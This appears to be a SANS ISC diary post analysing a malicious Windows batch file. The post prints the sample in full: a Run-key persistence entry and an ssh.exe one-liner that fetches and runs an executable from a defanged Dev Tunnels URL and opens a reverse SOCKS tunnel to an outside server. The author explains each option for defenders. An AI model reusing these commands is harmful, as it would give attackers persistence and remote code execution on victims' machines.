A few days ago, I wrote a diary[1] about a link file that abused the ssh.exe tool present in modern versions of Microsoft Windows. At the end, I mentioned that I will hunt for more SSH-related files/scripts. Guess what? I already found another one.

The script is a Windows batch file (SHA256:3172eb8283a3e82384e006458265b60001ba68c7982fda1b81053705496a999c)[2] that has a low Virustotal score. The file is pretty small:

@echo off
pushd "%~dp0"

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "%~dp0start.vbs" /f > nul

C:\Windows\System32\OpenSSH\ssh.exe -o "StrictHostKeyChecking=no" -o "PermitLocalCommand=yes" -o "LocalCommand=curl -L -o %temp%\file1.exe hxxps://vdch79w0-8000[.]inc1[.]devtunnels[.]ms/Ghost.exe && %temp%\file1.exe"  -R 5555 -N -f sozina@64[.]227[.]161[.]158

Besides the registry command that implements peristence, the script is a one-liner that will implement a backdoor on the victim's computer. How does it work?

The option "StrictHostKeyChecking=no" instructs SSH to not borrow the victim with host key verification. The option "PermitLocalCommand=yes" instructs SSH to allow execution of a local command after the connection has been established. Yes, you read correctly: you can execute from SSH! The local command is, of course, malicious. It tries to download an executable and launch it.

The SSH paramater "-R 5555" will set up a reverse tunnel from the remote server to the local machine. The normal syntax is "-R [bind_address:]port:host:hostport" but, when no explicit destination is specified, SSH will act as a SOCKS proxy (like "-D") and forward connections to the destinations requested by the remote SOCKS client! The remaining flags prevent SSH to execute a remote command ("-N") and will put the connection in the backfound ("-f").

Note that the malicious executable is delivered through a devtunnels.ms URL. This domain is a feature ("Dev Tunnels"[3]) offered primarily through Visual Studio. This allows developers to securely expose localhost ports over the internet so that remote clients can access and test local services during development. This is the Microsoft version of ngrok.

The host is still alive but the "sozina" account is not available, as well as the Dev Tunnel URL. My guess is that Ghost.exe is another RAT.

Merry Christmas!

[1] https://isc.sans.edu/diary/Christmas%20%22Gift%22%20Delivered%20Through%20SSH/31538
[2] https://www.virustotal.com/gui/file/3172eb8283a3e82384e006458265b60001ba68c7982fda1b81053705496a999c/details
[3] https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview
[4] https://ngrok.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key